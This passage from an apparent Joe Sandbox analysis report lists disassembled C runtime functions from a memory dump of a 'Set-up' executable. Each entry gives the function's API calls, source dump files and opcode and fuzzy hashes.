                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _get_osfhandle$CurrentHandleProcess$CloseDuplicate__doserrno_errno
                                                                                              • String ID:
                                                                                              • API String ID: 4219055303-0
                                                                                              • Opcode ID: 5eb351995ce138d67f532497bd70e53d2b8c853dbb81da2acd77c1165e98f3b2
                                                                                              • Instruction ID: 27b5aa4bd054fd2d45a599337adf50a277a5d2b32c0ba80417e657128dcd57ce
                                                                                              • Opcode Fuzzy Hash: 5eb351995ce138d67f532497bd70e53d2b8c853dbb81da2acd77c1165e98f3b2
                                                                                              • Instruction Fuzzy Hash: 38310532504285AFDB01CF78C884E993BF5EF0A318F1501A9E5148F2A1EB75EA00CB60
                                                                                              Function 6BB6FA37 Relevance: 12.1, APIs: 8, Instructions: 99COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __crtCompareStringW.MSVCR100(?,00001001,00000000,?,?,?,?), ref: 6BB75F76
                                                                                              • _errno.MSVCR100 ref: 6BB8C752
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8C75D
                                                                                              • _errno.MSVCR100 ref: 6BB8C76C
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8C777
                                                                                              • _errno.MSVCR100 ref: 6BB8C786
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8C791
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo$CompareString__crt
                                                                                              • String ID:
                                                                                              • API String ID: 380063240-0
                                                                                              • Opcode ID: b211c554b537cf239ba6c6cd4712025158d797d520ee2420003e00b4f6839abd
                                                                                              • Instruction ID: 640e82754ec47d90295782ff9a4deb67e83583ec03512eaad278fedacda831db
                                                                                              • Opcode Fuzzy Hash: b211c554b537cf239ba6c6cd4712025158d797d520ee2420003e00b4f6839abd
                                                                                              • Instruction Fuzzy Hash: 4631C2B56002D59BDB205E79C8817BE36A6EB017A4F540295E870DB2D0FB7CCD40DBE1
                                                                                              Function 6BB64B95 Relevance: 12.1, APIs: 8, Instructions: 97stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _getptd.MSVCR100(?,?,?,?,?,?,?,6BB64CC0,00000014), ref: 6BB64BAF
                                                                                                • Part of subcall function 6BB64E90: _getptd.MSVCR100(6BB64EF0,0000000C,6BB89FD5,?,?,6BB69233,?), ref: 6BB64E9C
                                                                                                • Part of subcall function 6BB64E90: _lock.MSVCR100(0000000C), ref: 6BB64EB3
                                                                                              • _calloc_crt.MSVCR100(000000D8,00000001), ref: 6BB64BCF
                                                                                              • _lock.MSVCR100(0000000C), ref: 6BB64BE5
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • __copytlocinfo_nolock.LIBCMT ref: 6BB64BF3
                                                                                                • Part of subcall function 6BB6497A: _unlock.MSVCR100(0000000C,6BB64C01), ref: 6BB6497C
                                                                                                • Part of subcall function 6BB64DDA: __expandlocale.LIBCMT ref: 6BB64E34
                                                                                                • Part of subcall function 6BB64DDA: strcmp.MSVCR100(?,00000048,?,?,?,00000001,00000000,00000000), ref: 6BB64E50
                                                                                              • strcmp.MSVCR100(00000000,6BC039A0), ref: 6BB64C28
                                                                                              • _lock.MSVCR100(0000000C), ref: 6BB64C39
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,?,6BB64CC0,00000014), ref: 6BB90C98
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,6BB64CC0,00000014), ref: 6BB90CA3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _lock$_getptdstrcmp$CriticalEnterSection__copytlocinfo_nolock__expandlocale_calloc_crt_errno_invalid_parameter_noinfo_unlock
                                                                                              • String ID:
                                                                                              • API String ID: 2630553387-0
                                                                                              • Opcode ID: 0b417cad21f35aec09b6ef096b594c5ff1b49930d979d25ffd48705787865019
                                                                                              • Instruction ID: bd9a97f26dde455b478f3ca6b5c19d6c9bc0813c78ca3e8d7ac3ca0e9e9d2455
                                                                                              • Opcode Fuzzy Hash: 0b417cad21f35aec09b6ef096b594c5ff1b49930d979d25ffd48705787865019
                                                                                              • Instruction Fuzzy Hash: 1F31DE71908B84EEEB149FB4D856B9C77F0AF89398F10855ED40957380FBBD8E40CA25
                                                                                              Function 6BB6B2A9 Relevance: 12.1, APIs: 8, Instructions: 86stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _strlen.LIBCMT(00000000,?,?,6BB6B286), ref: 6BB6B2C5
                                                                                              • _calloc_crt.MSVCR100(00000001,00000004,?,?,6BB6B286), ref: 6BB6B2D5
                                                                                              • _strlen.LIBCMT(00000000,?,?,?,6BB6B286), ref: 6BB6B2FC
                                                                                              • _calloc_crt.MSVCR100(00000001,00000001,?,?,?,6BB6B286), ref: 6BB6B30D
                                                                                              • strcpy_s.MSVCR100(00000000,00000001,00000000,?,?,?,6BB6B286), ref: 6BB6B321
                                                                                              • free.MSVCR100(?,?,?,6BB6B286), ref: 6BB6B33E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _calloc_crt_strlen$freestrcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 1972913904-0
                                                                                              • Opcode ID: 4a6506466fc531fb1ff6f7dbf1cd379ea9387cca2686a209c41de9a2cd7050d2
                                                                                              • Instruction ID: 68244346960e3ce5918db7086c3a295d1420ea149801c4713e83feb2a78fe153
                                                                                              • Opcode Fuzzy Hash: 4a6506466fc531fb1ff6f7dbf1cd379ea9387cca2686a209c41de9a2cd7050d2
                                                                                              • Instruction Fuzzy Hash: BE21F9B38095D15BEB314B799C42B5B2BF8EB927E8F150549F46453080FB7EDE838650
                                                                                              Function 6BB710E3 Relevance: 12.1, APIs: 8, Instructions: 86COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT(00000000,?,00000000,6BB90869,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB71107
                                                                                              • _calloc_crt.MSVCR100(00000001,00000004,?,?,00000000,6BB90869,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB71118
                                                                                              • _wcslen.LIBCMT(00000000,?,?,00000000,6BB90869,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB7113C
                                                                                              • _calloc_crt.MSVCR100(00000001,00000002,?,?,00000000,6BB90869,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB7114E
                                                                                              • wcscpy_s.MSVCR100(00000000,00000001,00000000,?,?,00000000,6BB90869,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB71162
                                                                                              • free.MSVCR100(?,?,00000000,6BB90869,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB71180
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _calloc_crt_wcslen$freewcscpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 968141106-0
                                                                                              • Opcode ID: a11b8af18d8d86b902f006211fda3bfc83fcd27cc0266b46c1232eed4ce0fc96
                                                                                              • Instruction ID: 3c1c126e9b3b67944578fcf339fe25db6281c1e3aff6c40c956360de551ca921
                                                                                              • Opcode Fuzzy Hash: a11b8af18d8d86b902f006211fda3bfc83fcd27cc0266b46c1232eed4ce0fc96
                                                                                              • Instruction Fuzzy Hash: CD21F9335142E196EB315B7A9C45B2633F4DF82778F25016EE4709A0C0EF7DD981C6A1
                                                                                              Function 6BB9F174 Relevance: 12.1, APIs: 8, Instructions: 81synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB9F17B
                                                                                              • GetTickCount.KERNEL32 ref: 6BB9F18B
                                                                                              • WaitForSingleObject.KERNEL32(?,00000064), ref: 6BB9F1AB
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6BB9F1B7
                                                                                              • GetTickCount.KERNEL32 ref: 6BB9F1E8
                                                                                              • GetTickCount.KERNEL32 ref: 6BB9F1F2
                                                                                              • GetTickCount.KERNEL32 ref: 6BB9F21D
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6BB9F251
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$CriticalSection$EnterH_prolog3LeaveObjectSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 2258694387-0
                                                                                              • Opcode ID: 3446cc88c6b25b1f34f8c119d201727ad0b29e0bceef09c9e0d3855c7563b009
                                                                                              • Instruction ID: da015f785f6e89b6e9a851754aed348baa86f8c90cc5a8df978b2d11f900eeae
                                                                                              • Opcode Fuzzy Hash: 3446cc88c6b25b1f34f8c119d201727ad0b29e0bceef09c9e0d3855c7563b009
                                                                                              • Instruction Fuzzy Hash: 7D219435D40A96DBDB10BF74E8867AD7771FF07724F200276F110A65C0D7B9A9408A91
                                                                                              Function 6BB6AA8C Relevance: 12.1, APIs: 8, Instructions: 76COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DecodePointer.KERNEL32(6BC07580,6BB6BD3C,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB6AAA1
                                                                                              • DecodePointer.KERNEL32(?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB6AAAE
                                                                                              • _msize.MSVCR100(00000000,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB6AACB
                                                                                                • Part of subcall function 6BB62231: HeapSize.KERNEL32(00000000,00000000,?,6BB6AAD0,00000000,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC), ref: 6BB6224B
                                                                                              • EncodePointer.KERNEL32(?,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB6AAE7
                                                                                              • EncodePointer.KERNEL32(-00000004,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB6AAEF
                                                                                              • _realloc_crt.MSVCR100(00000000,00000800,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB72BAF
                                                                                              • EncodePointer.KERNEL32(00000000,?,?,?,6BB6AA57,?,6BB6AA70,0000000C,6BB6BAA1,?,?,6BB8F2FC,6BBFFC34,?), ref: 6BB72BC5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 765448609-0
                                                                                              • Opcode ID: 8a922599826056ef7fea20593ec7f0ccdbf39706a745f3dfdad82fafff969bb4
                                                                                              • Instruction ID: a263fc818ca65cac99f55e61d9230c74d66da0d07da9a682f4aa083379e7cdb2
                                                                                              • Opcode Fuzzy Hash: 8a922599826056ef7fea20593ec7f0ccdbf39706a745f3dfdad82fafff969bb4
                                                                                              • Instruction Fuzzy Hash: A711B132604255AFEB116F64DC828CE77FAEB573A1315043EE805E3210FB7AED809B90
                                                                                              Function 6BB62337 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB6234D
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB623B8
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB623C8
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB6933E
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB69347
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB6934F
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB69357
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: DecrementInterlocked
                                                                                              • String ID:
                                                                                              • API String ID: 3448037634-0
                                                                                              • Opcode ID: 37adc6a75efcb5ff0427904141fc2a079989e73a2fc22f2a7130c16e630bcb73
                                                                                              • Instruction ID: a4367f10e3e7f4d00d1f7e23b757566d0c479a4fa97ac0fe1bb0bd38457a3b59
                                                                                              • Opcode Fuzzy Hash: 37adc6a75efcb5ff0427904141fc2a079989e73a2fc22f2a7130c16e630bcb73
                                                                                              • Instruction Fuzzy Hash: 7C114C35F44699AFEB009F69CC84B4AF7ACEF46BD4F044566A918D7141F778EC008BA1
                                                                                              Function 6BB61F13 Relevance: 12.1, APIs: 8, Instructions: 64COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InterlockedIncrement.KERNEL32(00000001), ref: 6BB61F25
                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6BB61F90
                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6BB61F9E
                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6BB62ABC
                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6BB62AC4
                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6BB62ACC
                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6BB62AD4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: IncrementInterlocked
                                                                                              • String ID:
                                                                                              • API String ID: 3508698243-0
                                                                                              • Opcode ID: 46ee7c0ad8855c0b35328c3267f60aa355734fecf3322f1882ab50ac42dd1bee
                                                                                              • Instruction ID: b2305b20a363cba3b184815af2cadb932a08b90933208dde7d9e97168daea02a
                                                                                              • Opcode Fuzzy Hash: 46ee7c0ad8855c0b35328c3267f60aa355734fecf3322f1882ab50ac42dd1bee
                                                                                              • Instruction Fuzzy Hash: 86115E35F482A9ABEB009F79DC84B4ABBACEF457D4F085462E508D7100F778EC008BA1
                                                                                              Function 6BBD8664 Relevance: 12.1, APIs: 8, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _errno.MSVCR100(6BBD8740,00000010,6BB88C0C,00000000,?,00000000,?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD8678
                                                                                              • _errno.MSVCR100(6BBD8740,00000010,6BB88C0C,00000000,?,00000000,?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD8697
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BBD8740,00000010,6BB88C0C,00000000,?,00000000,?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD86A2
                                                                                              • _get_osfhandle.MSVCR100(?,6BBD8740,00000010,6BB88C0C,00000000,?,00000000,?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD86DE
                                                                                              • FlushFileBuffers.KERNEL32(00000000,6BBD8740,00000010,6BB88C0C,00000000,?,00000000,?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD86E5
                                                                                              • GetLastError.KERNEL32(?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD86EF
                                                                                              • __doserrno.MSVCR100(?,?,?,?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD8704
                                                                                              • _errno.MSVCR100(6BBD8740,00000010,6BB88C0C,00000000,?,00000000,?,6BB6FEFA,?,6BB6FF18,0000000C), ref: 6BBD870E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$BuffersErrorFileFlushLast__doserrno_get_osfhandle_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3018510309-0
                                                                                              • Opcode ID: e954b44ad65344c4c80cf73f744f2194a0a698baa1064155f6fb728a781061df
                                                                                              • Instruction ID: f1f319512f66ddd047716b908529d1c2b5360821fe3433453242c65e157a5d1f
                                                                                              • Opcode Fuzzy Hash: e954b44ad65344c4c80cf73f744f2194a0a698baa1064155f6fb728a781061df
                                                                                              • Instruction Fuzzy Hash: 9611B8718003858FDB109FB8CC86B6D7B70AF0236AF511289D4309B2D0EBBDCA408FA1
                                                                                              Function 6BB60698 Relevance: 12.0, APIs: 8, Instructions: 46threadCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(6BB53238,?,6BB607BA,6BBF7F62), ref: 6BB6069C
                                                                                              • __set_flsgetvalue.MSVCR100 ref: 6BB606AA
                                                                                                • Part of subcall function 6BB6067B: TlsGetValue.KERNEL32(?,6BB606AF), ref: 6BB60684
                                                                                              • SetLastError.KERNEL32(00000000), ref: 6BB606BC
                                                                                              • _calloc_crt.MSVCR100(00000001,00000214), ref: 6BB875B7
                                                                                              • DecodePointer.KERNEL32(00000000), ref: 6BB875D5
                                                                                              • _initptd.MSVCR100(00000000,00000000), ref: 6BB875E4
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BB875EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CurrentDecodePointerThreadValue__set_flsgetvalue_calloc_crt_initptd
                                                                                              • String ID:
                                                                                              • API String ID: 242762301-0
                                                                                              • Opcode ID: c59437a26d6cbf479fc1824889c3aa4dd82d973b76bc6d3fe4863534aea8fd03
                                                                                              • Instruction ID: eb40363abfc7fe3c7748973e37cb0fb4d1a348b7f9fbf6987660cbcc49fdf113
                                                                                              • Opcode Fuzzy Hash: c59437a26d6cbf479fc1824889c3aa4dd82d973b76bc6d3fe4863534aea8fd03
                                                                                              • Instruction Fuzzy Hash: EBF02D335046B15FD7211FB59D4AA5E7BE0DF86BB07190119F824D3090EF6ACD018AB5
                                                                                              Function 6BB717C4 Relevance: 10.6, APIs: 7, Instructions: 148COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_fileno_invalid_parameter_noinfo_lseek
                                                                                              • String ID:
                                                                                              • API String ID: 1667283477-0
                                                                                              • Opcode ID: 7b04b56aed9a1f440a749fd1420696a05e4feb93593f961cca03372dbe421207
                                                                                              • Instruction ID: da17fc714405eadbefa015e98292e27d2df1655d7ef3f1cc2f085aead05aa4c2
                                                                                              • Opcode Fuzzy Hash: 7b04b56aed9a1f440a749fd1420696a05e4feb93593f961cca03372dbe421207
                                                                                              • Instruction Fuzzy Hash: AC51B170E042D9EFDB30AE68C890B497BB1EF46754F1481B9DA359B281D73CDA41CBA1
                                                                                              Function 6BB6DE57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 140COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator=operator+
                                                                                              • String ID: std::nullptr_t$volatile
                                                                                              • API String ID: 1352385710-3726895890
                                                                                              • Opcode ID: 1c94d9e125bf1792f9829a18b326e8a1b8af3688a3ae38f099db71be940c29b2
                                                                                              • Instruction ID: 456b4d79b3b56035dda8a1008f8f1fddd61689beeeaf253cd9c5cdf6bd5fa4c4
                                                                                              • Opcode Fuzzy Hash: 1c94d9e125bf1792f9829a18b326e8a1b8af3688a3ae38f099db71be940c29b2
                                                                                              • Instruction Fuzzy Hash: 424112319441C9EFDF11AFA8D8819AE7BB4FF1A381F5144A9F9149A251E73ACB40CB50
                                                                                              Function 6BB6B128 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(?,?,00000000,00000001), ref: 6BB6B149
                                                                                              • ___crtGetStringTypeA.LIBCMT ref: 6BB6B19A
                                                                                              • __crtLCMapStringA.MSVCR100(00000000,?,00000100,00000020,00000100,?,00000100,?,00000000,00000000,00000001,00000020,00000100,?,?,?), ref: 6BB6B1BA
                                                                                              • __crtLCMapStringA.MSVCR100(00000000,?,00000200,00000020,00000100,?,00000100,?,00000000), ref: 6BB6B1DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
